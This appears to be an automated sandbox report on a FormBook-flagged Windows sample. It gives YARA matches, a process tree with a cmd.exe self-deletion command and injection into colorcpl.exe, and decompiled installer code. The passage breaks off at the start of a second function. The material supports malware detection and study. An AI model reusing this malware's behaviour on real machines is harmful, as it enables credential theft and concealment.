                                                                                    File size:223664 bytes
                                                                                    MD5 hash:059A1308EBDFAE6EE52FD646D341AEAC
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.275429619.00000000005E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.275429619.00000000005E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.275429619.00000000005E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.220049197.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.220049197.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.220049197.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.275382730.0000000000590000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.275382730.0000000000590000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.275382730.0000000000590000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    Reputation:low
                                                                                    Start time:08:07:34
                                                                                    Start date:03/03/2021
                                                                                    Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\SysWOW64\colorcpl.exe
                                                                                    Imagebase:0x13e0000
                                                                                    File size:86528 bytes
                                                                                    MD5 hash:746F3B5E7652EA0766BA10414D317981
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.484188593.0000000001320000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.484188593.0000000001320000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.484188593.0000000001320000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.484311977.0000000001350000.00000004.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.484311977.0000000001350000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.484311977.0000000001350000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    Reputation:moderate
                                                                                    Start time:08:07:38
                                                                                    Start date:03/03/2021
                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:/c del 'C:\Users\user\Desktop\Nz7NA3F7z7.exe'
                                                                                    Imagebase:0x3f0000
                                                                                    File size:232960 bytes
                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Start time:08:07:38
                                                                                    Start date:03/03/2021
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff6b2800000
                                                                                    File size:625664 bytes
                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high

                                                                                    Disassembly

                                                                                    Code Analysis

                                                                                    Executed Functions

                                                                                    C-Code - Quality: 78%
                                                                                    			_entry_() {
                                                                                    				intOrPtr _t47;
                                                                                    				CHAR* _t51;
                                                                                    				char* _t54;
                                                                                    				CHAR* _t56;
                                                                                    				void* _t60;
                                                                                    				intOrPtr _t62;
                                                                                    				int _t64;
                                                                                    				char* _t67;
                                                                                    				char* _t68;
                                                                                    				int _t69;
                                                                                    				char* _t71;
                                                                                    				char* _t74;
                                                                                    				int _t91;
                                                                                    				void* _t95;
                                                                                    				void* _t107;
                                                                                    				intOrPtr* _t108;
                                                                                    				char _t111;
                                                                                    				CHAR* _t116;
                                                                                    				char* _t117;
                                                                                    				CHAR* _t118;
                                                                                    				char* _t119;
                                                                                    				void* _t121;
                                                                                    				char* _t123;
                                                                                    				char* _t125;
                                                                                    				char* _t126;
                                                                                    				void* _t128;
                                                                                    				void* _t129;
                                                                                    				char _t147;
                                                                                    
                                                                                    				 *(_t129 + 0x20) = 0;
                                                                                    				 *((intOrPtr*)(_t129 + 0x14)) = "Error writing temporary file. Make sure your temp folder is valid.";
                                                                                    				 *(_t129 + 0x1c) = 0;
                                                                                    				 *(_t129 + 0x18) = 0x20;
                                                                                    				SetErrorMode(0x8001); // executed
                                                                                    				if(GetVersion() != 6) {
                                                                                    					_t108 = E00405F57(0);
                                                                                    					if(_t108 != 0) {
                                                                                    						 *_t108(0xc00);
                                                                                    					}
                                                                                    				}
                                                                                    				_t118 = "UXTHEME";
                                                                                    				goto L4;
                                                                                    				while(1) {
                                                                                    					L22:
                                                                                    					_t111 =  *_t56;
                                                                                    					_t134 = _t111;
                                                                                    					if(_t111 == 0) {
                                                                                    						break;
                                                                                    					}
                                                                                    					__eflags = _t111 - 0x20;
                                                                                    					if(_t111 != 0x20) {
                                                                                    						L10:
                                                                                    						__eflags =  *_t56 - 0x22;
                                                                                    						 *((char*)(_t129 + 0x14)) = 0x20;
                                                                                    						if( *_t56 == 0x22) {
                                                                                    							_t56 =  &(_t56[1]);
                                                                                    							__eflags = _t56;
                                                                                    							 *((char*)(_t129 + 0x14)) = 0x22;
                                                                                    						}
                                                                                    						__eflags =  *_t56 - 0x2f;
                                                                                    						if( *_t56 != 0x2f) {
                                                                                    							L20:
                                                                                    							_t56 = E004056E5(_t56,  *((intOrPtr*)(_t129 + 0x14)));
                                                                                    							__eflags =  *_t56 - 0x22;
                                                                                    							if(__eflags == 0) {
                                                                                    								_t56 =  &(_t56[1]);
                                                                                    								__eflags = _t56;
                                                                                    							}
                                                                                    							continue;
                                                                                    						} else {
                                                                                    							_t56 =  &(_t56[1]);
                                                                                    							__eflags =  *_t56 - 0x53;
                                                                                    							if( *_t56 == 0x53) {
                                                                                    								__eflags = (_t56[1] | 0x00000020) - 0x20;
                                                                                    								if((_t56[1] | 0x00000020) == 0x20) {
                                                                                    									_t14 = _t129 + 0x18;
                                                                                    									 *_t14 =  *(_t129 + 0x18) | 0x00000002;
                                                                                    									__eflags =  *_t14;
                                                                                    								}
                                                                                    							}
                                                                                    							__eflags =  *_t56 - 0x4352434e;
                                                                                    							if( *_t56 == 0x4352434e) {
                                                                                    								__eflags = (_t56[4] | 0x00000020) - 0x20;
                                                                                    								if((_t56[4] | 0x00000020) == 0x20) {
                                                                                    									_t17 = _t129 + 0x18;
                                                                                    									 *_t17 =  *(_t129 + 0x18) | 0x00000004;
                                                                                    									__eflags =  *_t17;
                                                                                    								}
                                                                                    							}
                                                                                    							__eflags =  *((intOrPtr*)(_t56 - 2)) - 0x3d442f20;
                                                                                    							if( *((intOrPtr*)(_t56 - 2)) == 0x3d442f20) {
                                                                                    								 *((intOrPtr*)(_t56 - 2)) = 0;
                                                                                    								__eflags =  &(_t56[2]);
                                                                                    								E00405BC7("C:\\Users\\hardz\\AppData\\Local\\Temp",  &(_t56[2]));
                                                                                    								L25:
                                                                                    								_t116 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
                                                                                    								GetTempPathA(0x400, _t116); // executed
                                                                                    								_t60 = E004030F9(_t134);
                                                                                    								_t135 = _t60;
                                                                                    								if(_t60 != 0) {
                                                                                    									L27:
                                                                                    									DeleteFileA("1033"); // executed
                                                                                    									_t62 = E00402C55(_t136,  *(_t129 + 0x18)); // executed
                                                                                    									 *((intOrPtr*)(_t129 + 0x10)) = _t62;
                                                                                    									if(_t62 != 0) {
                                                                                    										L37:
                                                                                    										E00403540();
                                                                                    										__imp__OleUninitialize();
                                                                                    										_t143 =  *((intOrPtr*)(_t129 + 0x10));
                                                                                    										if( *((intOrPtr*)(_t129 + 0x10)) == 0) {
                                                                                    											__eflags =  *0x42ecb4;
                                                                                    											if( *0x42ecb4 == 0) {
                                                                                    												L64:
                                                                                    												_t64 =  *0x42eccc;
                                                                                    												__eflags = _t64 - 0xffffffff;
                                                                                    												if(_t64 != 0xffffffff) {
                                                                                    													 *(_t129 + 0x1c) = _t64;
                                                                                    												}
                                                                                    												ExitProcess( *(_t129 + 0x1c));
                                                                                    											}
                                                                                    											_t126 = E00405F57(5);
                                                                                    											_t119 = E00405F57(6);
                                                                                    											_t67 = E00405F57(7);
                                                                                    											__eflags = _t126;
                                                                                    											_t117 = _t67;
                                                                                    											if(_t126 != 0) {
                                                                                    												__eflags = _t119;
                                                                                    												if(_t119 != 0) {
                                                                                    													__eflags = _t117;
                                                                                    													if(_t117 != 0) {
                                                                                    														_t74 =  *_t126(GetCurrentProcess(), 0x28, _t129 + 0x20);
                                                                                    														__eflags = _t74;
                                                                                    														if(_t74 != 0) {
                                                                                    															 *_t119(0, "SeShutdownPrivilege", _t129 + 0x28);
                                                                                    															 *(_t129 + 0x3c) = 1;
                                                                                    															 *(_t129 + 0x48) = 2;
                                                                                    															 *_t117( *((intOrPtr*)(_t129 + 0x34)), 0, _t129 + 0x2c, 0, 0, 0);
                                                                                    														}
                                                                                    													}
                                                                                    												}
                                                                                    											}
                                                                                    											_t68 = E00405F57(8);
                                                                                    											__eflags = _t68;
                                                                                    											if(_t68 == 0) {
                                                                                    												L62:
                                                                                    												_t69 = ExitWindowsEx(2, 0x80040002);
                                                                                    												__eflags = _t69;
                                                                                    												if(_t69 != 0) {
                                                                                    													goto L64;
                                                                                    												}
                                                                                    												goto L63;
                                                                                    											} else {
                                                                                    												_t71 =  *_t68(0, 0, 0, 0x25, 0x80040002);
                                                                                    												__eflags = _t71;
                                                                                    												if(_t71 == 0) {
                                                                                    													L63:
                                                                                    													E0040140B(9);
                                                                                    													goto L64;
                                                                                    												}
                                                                                    												goto L62;
                                                                                    											}
                                                                                    										}
                                                                                    										E00405488( *((intOrPtr*)(_t129 + 0x14)), 0x200010);
                                                                                    										ExitProcess(2);
                                                                                    									}
                                                                                    									if( *0x42ec3c == 0) {
                                                                                    										L36:
                                                                                    										 *0x42eccc =  *0x42eccc | 0xffffffff;
                                                                                    										 *(_t129 + 0x1c) = E0040361A( *0x42eccc);
                                                                                    										goto L37;
                                                                                    									}
                                                                                    									_t123 = E004056E5(_t125, 0);
                                                                                    									while(_t123 >= _t125) {
                                                                                    										__eflags =  *_t123 - 0x3d3f5f20;
                                                                                    										if(__eflags == 0) {
                                                                                    											break;
                                                                                    										}
                                                                                    										_t123 = _t123 - 1;
                                                                                    										__eflags = _t123;
                                                                                    									}
                                                                                    									_t140 = _t123 - _t125;
                                                                                    									 *((intOrPtr*)(_t129 + 0x10)) = "Error launching installer";
                                                                                    									if(_t123 < _t125) {
                                                                                    										_t121 = E0040540F(_t143);
                                                                                    										lstrcatA(_t116, "~nsu");
                                                                                    										if(_t121 != 0) {
                                                                                    											lstrcatA(_t116, "A");
                                                                                    										}
                                                                                    										lstrcatA(_t116, ".tmp");
                                                                                    										_t127 = "C:\\Users\\hardz\\Desktop";
                                                                                    										if(lstrcmpiA(_t116, "C:\\Users\\hardz\\Desktop") != 0) {
                                                                                    											_push(_t116);
                                                                                    											if(_t121 == 0) {
                                                                                    												E004053F2();
                                                                                    											} else {
                                                                                    												E00405375();
                                                                                    											}
                                                                                    											SetCurrentDirectoryA(_t116);
                                                                                    											_t147 = "C:\\Users\\hardz\\AppData\\Local\\Temp"; // 0x43
                                                                                    											if(_t147 == 0) {
                                                                                    												E00405BC7("C:\\Users\\hardz\\AppData\\Local\\Temp", _t127);
                                                                                    											}
                                                                                    											E00405BC7(0x42f000,  *(_t129 + 0x20));
                                                                                    											 *0x42f400 = 0x41;
                                                                                    											_t128 = 0x1a;
                                                                                    											do {
                                                                                    												E00405BE9(0, _t116, 0x428c58, 0x428c58,  *((intOrPtr*)( *0x42ec30 + 0x120)));
                                                                                    												DeleteFileA(0x428c58);
                                                                                    												if( *((intOrPtr*)(_t129 + 0x10)) != 0) {
                                                                                    													_t91 = CopyFileA("C:\\Users\\hardz\\Desktop\\Nz7NA3F7z7.exe", 0x428c58, 1);
                                                                                    													_t149 = _t91;
                                                                                    													if(_t91 != 0) {
                                                                                    														_push(0);
                                                                                    														_push(0x428c58);
                                                                                    														E00405915(_t149);
                                                                                    														E00405BE9(0, _t116, 0x428c58, 0x428c58,  *((intOrPtr*)( *0x42ec30 + 0x124)));
                                                                                    														_t95 = E00405427(0x428c58);
                                                                                    														if(_t95 != 0) {
                                                                                    															CloseHandle(_t95);
                                                                                    															 *((intOrPtr*)(_t129 + 0x10)) = 0;
                                                                                    														}
                                                                                    													}
                                                                                    												}
                                                                                    												 *0x42f400 =  *0x42f400 + 1;
                                                                                    												_t128 = _t128 - 1;
                                                                                    												_t151 = _t128;
                                                                                    											} while (_t128 != 0);
                                                                                    											_push(0);
                                                                                    											_push(_t116);
                                                                                    											E00405915(_t151);
                                                                                    										}
                                                                                    										goto L37;
                                                                                    									}
                                                                                    									 *_t123 = 0;
                                                                                    									_t124 =  &(_t123[4]);
                                                                                    									if(E0040579B(_t140,  &(_t123[4])) == 0) {
                                                                                    										goto L37;
                                                                                    									}
                                                                                    									E00405BC7("C:\\Users\\hardz\\AppData\\Local\\Temp", _t124);
                                                                                    									E00405BC7(0x434800, _t124);
                                                                                    									 *((intOrPtr*)(_t129 + 0x10)) = 0;
                                                                                    									goto L36;
                                                                                    								}
                                                                                    								GetWindowsDirectoryA(_t116, 0x3fb);
                                                                                    								lstrcatA(_t116, "\\Temp");
                                                                                    								_t107 = E004030F9(_t135);
                                                                                    								_t136 = _t107;
                                                                                    								if(_t107 == 0) {
                                                                                    									goto L37;
                                                                                    								}
                                                                                    								goto L27;
                                                                                    							} else {
                                                                                    								goto L20;
                                                                                    							}
                                                                                    						}
                                                                                    					} else {
                                                                                    						goto L9;
                                                                                    					}
                                                                                    					do {
                                                                                    						L9:
                                                                                    						_t56 =  &(_t56[1]);
                                                                                    						__eflags =  *_t56 - 0x20;
                                                                                    					} while ( *_t56 == 0x20);
                                                                                    					goto L10;
                                                                                    				}
                                                                                    				goto L25;
                                                                                    				L4:
                                                                                    				E00405EE9(_t118); // executed
                                                                                    				_t118 =  &(_t118[lstrlenA(_t118) + 1]);
                                                                                    				if( *_t118 != 0) {
                                                                                    					goto L4;
                                                                                    				} else {
                                                                                    					E00405F57(0xd);
                                                                                    					_t47 = E00405F57(0xb);
                                                                                    					 *0x42ec24 = _t47;
                                                                                    					__imp__#17();
                                                                                    					__imp__OleInitialize(0); // executed
                                                                                    					 *0x42ecd8 = _t47;
                                                                                    					SHGetFileInfoA(0x429058, 0, _t129 + 0x38, 0x160, 0); // executed
                                                                                    					E00405BC7(0x42e420, "NSIS Error");
                                                                                    					_t51 = GetCommandLineA();
                                                                                    					_t125 = "\"C:\\Users\\hardz\\Desktop\\Nz7NA3F7z7.exe\" ";
                                                                                    					E00405BC7(_t125, _t51);
                                                                                    					 *0x42ec20 = GetModuleHandleA(0);
                                                                                    					_t54 = _t125;
                                                                                    					if("\"C:\\Users\\hardz\\Desktop\\Nz7NA3F7z7.exe\" " == 0x22) {
                                                                                    						 *((char*)(_t129 + 0x14)) = 0x22;
                                                                                    						_t54 =  &M00434001;
                                                                                    					}
                                                                                    					_t56 = CharNextA(E004056E5(_t54,  *((intOrPtr*)(_t129 + 0x14))));
                                                                                    					 *(_t129 + 0x20) = _t56;
                                                                                    					goto L22;
                                                                                    				}
                                                                                    			}































                                                                                    0x0040313b
                                                                                    0x0040313f
                                                                                    0x00403147
                                                                                    0x0040314b
                                                                                    0x00403150
                                                                                    0x00403160
                                                                                    0x00403163
                                                                                    0x0040316a
                                                                                    0x00403171
                                                                                    0x00403171
                                                                                    0x0040316a
                                                                                    0x00403173
                                                                                    0x00403173
                                                                                    0x00403289
                                                                                    0x00403289
                                                                                    0x00403289
                                                                                    0x0040328b
                                                                                    0x0040328d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403222
                                                                                    0x00403225
                                                                                    0x0040322d
                                                                                    0x0040322d
                                                                                    0x00403230
                                                                                    0x00403235
                                                                                    0x00403237
                                                                                    0x00403237
                                                                                    0x00403238
                                                                                    0x00403238
                                                                                    0x0040323d
                                                                                    0x00403240
                                                                                    0x00403279
                                                                                    0x0040327e
                                                                                    0x00403283
                                                                                    0x00403286
                                                                                    0x00403288
                                                                                    0x00403288
                                                                                    0x00403288
                                                                                    0x00000000
                                                                                    0x00403242
                                                                                    0x00403242
                                                                                    0x00403243
                                                                                    0x00403246
                                                                                    0x0040324e
                                                                                    0x00403251
                                                                                    0x00403253
                                                                                    0x00403253
                                                                                    0x00403253
                                                                                    0x00403253
                                                                                    0x00403251
                                                                                    0x00403258
                                                                                    0x0040325e
                                                                                    0x00403266
                                                                                    0x00403269
                                                                                    0x0040326b
                                                                                    0x0040326b
                                                                                    0x0040326b
                                                                                    0x0040326b
                                                                                    0x00403269
                                                                                    0x00403270
                                                                                    0x00403277
                                                                                    0x00403291
                                                                                    0x00403294
                                                                                    0x0040329d
                                                                                    0x004032a2
                                                                                    0x004032a2
                                                                                    0x004032ad
                                                                                    0x004032b3
                                                                                    0x004032b8
                                                                                    0x004032ba
                                                                                    0x004032e0
                                                                                    0x004032e5
                                                                                    0x004032ef
                                                                                    0x004032f6
                                                                                    0x004032fa
                                                                                    0x00403361
                                                                                    0x00403361
                                                                                    0x00403366
                                                                                    0x0040336c
                                                                                    0x00403370
                                                                                    0x00403485
                                                                                    0x0040348b
                                                                                    0x00403528
                                                                                    0x00403528
                                                                                    0x0040352d
                                                                                    0x00403530
                                                                                    0x00403532
                                                                                    0x00403532
                                                                                    0x0040353a
                                                                                    0x0040353a
                                                                                    0x0040349a
                                                                                    0x004034a3
                                                                                    0x004034a5
                                                                                    0x004034aa
                                                                                    0x004034ac
                                                                                    0x004034ae
                                                                                    0x004034b0
                                                                                    0x004034b2
                                                                                    0x004034b4
                                                                                    0x004034b6
                                                                                    0x004034c6
                                                                                    0x004034c8
                                                                                    0x004034ca
                                                                                    0x004034d7
                                                                                    0x004034e6
                                                                                    0x004034ee
                                                                                    0x004034f6
                                                                                    0x004034f6
                                                                                    0x004034ca
                                                                                    0x004034b6
                                                                                    0x004034b2
                                                                                    0x004034fa
                                                                                    0x004034ff
                                                                                    0x00403506
                                                                                    0x00403514
                                                                                    0x00403517
                                                                                    0x0040351d
                                                                                    0x0040351f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403508
                                                                                    0x0040350e
                                                                                    0x00403510
                                                                                    0x00403512
                                                                                    0x00403521
                                                                                    0x00403523
                                                                                    0x00000000
                                                                                    0x00403523
                                                                                    0x00000000
                                                                                    0x00403512
                                                                                    0x00403506
                                                                                    0x0040337f
                                                                                    0x00403386
                                                                                    0x00403386
                                                                                    0x00403302
                                                                                    0x00403351
                                                                                    0x00403351
                                                                                    0x0040335d
                                                                                    0x00000000
                                                                                    0x0040335d
                                                                                    0x0040330b
                                                                                    0x00403318
                                                                                    0x0040330f
                                                                                    0x00403315
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403317
                                                                                    0x00403317
                                                                                    0x00403317
                                                                                    0x0040331c
                                                                                    0x0040331e
                                                                                    0x00403326
                                                                                    0x00403397
                                                                                    0x00403399
                                                                                    0x004033a0
                                                                                    0x004033a8
                                                                                    0x004033a8
                                                                                    0x004033b3
                                                                                    0x004033b8
                                                                                    0x004033c7
                                                                                    0x004033cb
                                                                                    0x004033cc
                                                                                    0x004033d5
                                                                                    0x004033ce
                                                                                    0x004033ce
                                                                                    0x004033ce
                                                                                    0x004033db
                                                                                    0x004033e1
                                                                                    0x004033e7
                                                                                    0x004033ef
                                                                                    0x004033ef
                                                                                    0x004033fd
                                                                                    0x00403404
                                                                                    0x0040340d
                                                                                    0x00403413
                                                                                    0x0040341f
                                                                                    0x00403425
                                                                                    0x0040342f
                                                                                    0x00403439
                                                                                    0x0040343f
                                                                                    0x00403441
                                                                                    0x00403443
                                                                                    0x00403444
                                                                                    0x00403445
                                                                                    0x00403456
                                                                                    0x0040345c
                                                                                    0x00403463
                                                                                    0x00403466
                                                                                    0x0040346c
                                                                                    0x0040346c
                                                                                    0x00403463
                                                                                    0x00403441
                                                                                    0x00403470
                                                                                    0x00403476
                                                                                    0x00403476
                                                                                    0x00403476
                                                                                    0x00403479
                                                                                    0x0040347a
                                                                                    0x0040347b
                                                                                    0x0040347b
                                                                                    0x00000000
                                                                                    0x004033c7
                                                                                    0x00403328
                                                                                    0x0040332a
                                                                                    0x00403335
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040333d
                                                                                    0x00403348
                                                                                    0x0040334d
                                                                                    0x00000000
                                                                                    0x0040334d
                                                                                    0x004032c2
                                                                                    0x004032ce
                                                                                    0x004032d3
                                                                                    0x004032d8
                                                                                    0x004032da
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403277
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403227
                                                                                    0x00403227
                                                                                    0x00403227
                                                                                    0x00403228
                                                                                    0x00403228
                                                                                    0x00000000
                                                                                    0x00403227
                                                                                    0x00000000
                                                                                    0x00403178
                                                                                    0x00403179
                                                                                    0x00403185
                                                                                    0x0040318b
                                                                                    0x00000000
                                                                                    0x0040318d
                                                                                    0x0040318f
                                                                                    0x00403196
                                                                                    0x0040319b
                                                                                    0x004031a0
                                                                                    0x004031a7
                                                                                    0x004031ad
                                                                                    0x004031c3
                                                                                    0x004031d3
                                                                                    0x004031d8
                                                                                    0x004031de
                                                                                    0x004031e5
                                                                                    0x004031f8
                                                                                    0x004031fd
                                                                                    0x004031ff
                                                                                    0x00403201
                                                                                    0x00403206
                                                                                    0x00403206
                                                                                    0x00403216
                                                                                    0x0040321c
                                                                                    0x00000000
                                                                                    0x0040321c

                                                                                    APIs
                                                                                    • SetErrorMode.KERNELBASE ref: 00403150
                                                                                    • GetVersion.KERNEL32 ref: 00403156
                                                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040317F
                                                                                    • #17.COMCTL32(0000000B,0000000D), ref: 004031A0
                                                                                    • OleInitialize.OLE32(00000000), ref: 004031A7
                                                                                    • SHGetFileInfoA.SHELL32(00429058,00000000,?,00000160,00000000), ref: 004031C3
                                                                                    • GetCommandLineA.KERNEL32(0042E420,NSIS Error), ref: 004031D8
                                                                                    • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Nz7NA3F7z7.exe" ,00000000), ref: 004031EB
                                                                                    • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Nz7NA3F7z7.exe" ,00409168), ref: 00403216
                                                                                    • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004032AD
                                                                                    • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004032C2
                                                                                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032CE
                                                                                    • DeleteFileA.KERNELBASE(1033), ref: 004032E5
                                                                                      • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                                                                                      • Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?), ref: 00405F84
                                                                                    • OleUninitialize.OLE32(00000020), ref: 00403366
                                                                                    • ExitProcess.KERNEL32 ref: 00403386
                                                                                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Nz7NA3F7z7.exe" ,00000000,00000020), ref: 00403399
                                                                                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00409148,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Nz7NA3F7z7.exe" ,00000000,00000020), ref: 004033A8
                                                                                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Nz7NA3F7z7.exe" ,00000000,00000020), ref: 004033B3
                                                                                    • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Nz7NA3F7z7.exe" ,00000000,00000020), ref: 004033BF
                                                                                    • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004033DB
                                                                                    • DeleteFileA.KERNEL32(00428C58,00428C58,?,0042F000,?), ref: 00403425
                                                                                    • CopyFileA.KERNEL32(C:\Users\user\Desktop\Nz7NA3F7z7.exe,00428C58,00000001), ref: 00403439
                                                                                    • CloseHandle.KERNEL32(00000000,00428C58,00428C58,?,00428C58,00000000), ref: 00403466
                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 004034BF
                                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 00403517
                                                                                    • ExitProcess.KERNEL32 ref: 0040353A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Filelstrcat$ExitHandleProcess$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpilstrlen
                                                                                    • String ID: $ /D=$ _?=$"$"C:\Users\user\Desktop\Nz7NA3F7z7.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Nz7NA3F7z7.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$UXTHEME$\Temp$~nsu
                                                                                    • API String ID: 3469842172-2329903170
                                                                                    • Opcode ID: c827ac6488386cdb1cf1d6f25d9587759d491db5d28cf5fcf0659e8390b07969
                                                                                    • Instruction ID: d16e5acc50ad9605a1934e3a6ea537af925639c8ce6f3cfaab4d64070601e644
                                                                                    • Opcode Fuzzy Hash: c827ac6488386cdb1cf1d6f25d9587759d491db5d28cf5fcf0659e8390b07969
                                                                                    • Instruction Fuzzy Hash: ACA1E570908341AED7217F729C4AB2B7EACEB45309F04483FF540B61D2CB7CA9458A6E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 98%
                                                                                    			E004054EC(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
